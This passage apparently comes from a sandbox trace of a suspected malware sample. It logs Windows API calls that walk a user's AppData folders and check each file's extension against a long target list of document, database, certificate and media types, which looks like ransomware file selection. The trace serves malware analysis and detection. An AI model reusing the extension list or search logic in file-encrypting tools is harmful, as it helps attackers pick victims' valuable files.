lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mkidx", lpString2="ck.png") returned -1 [0036.778] lstrcmpiW (lpString1=".mkv", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mos", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mov", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mp4", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mpeg", lpString2="k.png") returned -1 [0036.778] lstrcmpiW (lpString1=".mpg", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mpv", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mrw", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".msg", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mxl", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".myi", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".nef", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".nrw", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".obj", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".odb", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".odc", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".odm", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".odp", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".ods", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".oft", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".one", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".onepkg", lpString2="ack.png") returned -1 [0036.779] lstrcmpiW (lpString1=".onetoc2", lpString2="lack.png") returned -1 [0036.779] lstrcmpiW (lpString1=".opt", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".oqy", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".orf", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".p12", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".p7b", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".p7c", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".pam", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".pbm", lpString2=".png") returned -1 [0036.779] lstrcmpiW (lpString1=".pct", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pcx", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pdd", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pdp", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pef", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pem", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pff", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pfm", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pfx", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pgm", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".php", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".php3", lpString2="k.png") returned -1 [0036.780] lstrcmpiW (lpString1=".php4", lpString2="k.png") returned -1 [0036.780] lstrcmpiW (lpString1=".php5", lpString2="k.png") returned -1 [0036.780] lstrcmpiW (lpString1=".phtml", lpString2="ck.png") returned -1 [0036.780] lstrcmpiW (lpString1=".pict", lpString2="k.png") returned -1 [0036.780] lstrcmpiW (lpString1=".pl", lpString2="png") returned -1 [0036.780] lstrcmpiW (lpString1=".pls", lpString2=".png") returned -1 [0036.780] lstrcmpiW (lpString1=".pm", lpString2="png") returned -1 [0036.780] lstrcmpiW (lpString1=".png", lpString2=".png") returned 0 [0036.780] FindNextFileW (in: hFindFile=0x6c4128, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f71a8d6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f71a8d6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5396df3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0036.780] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0036.781] lstrcmpiW (lpString1=".accda", lpString2="92.png") returned -1 [0036.781] lstrcmpiW (lpString1=".accdb", lpString2="92.png") returned -1 [0036.781] lstrcmpiW (lpString1=".accdc", lpString2="92.png") returned -1 [0036.781] lstrcmpiW (lpString1=".accde", lpString2="92.png") returned -1 [0036.781] lstrcmpiW (lpString1=".accdt", lpString2="92.png") returned -1 [0036.781] lstrcmpiW (lpString1=".accdw", lpString2="92.png") returned -1 [0036.781] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0036.781] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0036.781] lstrcmpiW (lpString1=".anim", lpString2="2.png") returned -1 [0036.781] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0036.782] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0036.782] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0036.782] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0036.782] lstrcmpiW (lpString1=".ascx", lpString2="2.png") returned -1 [0036.782] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0046.576] FindNextFileW (in: hFindFile=0x6c3fe8, lpFindFileData=0x3aaf58c | out: lpFindFileData=0x3aaf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.576] FindNextFileW (in: hFindFile=0x6c3fe8, lpFindFileData=0x3aaf58c | out: lpFindFileData=0x3aaf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5570eaa, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5570eaa, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x46a6d3e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x155e, dwReserved0=0x0, dwReserved1=0x0, cFileName="blank.jtp", cAlternateFileName="")) returned 1 [0057.583] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.583] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0057.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.585] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.585] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.585] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.585] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.585] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0057.585] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.585] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.585] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.585] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.585] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.586] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0057.586] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.587] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.587] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.587] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.587] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.587] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0057.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.587] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.587] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.587] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.587] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.587] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0057.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.588] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.588] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.588] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.588] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.588] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0057.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.588] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.588] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.588] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.588] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.588] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0057.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.589] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.589] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.589] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.589] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.589] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 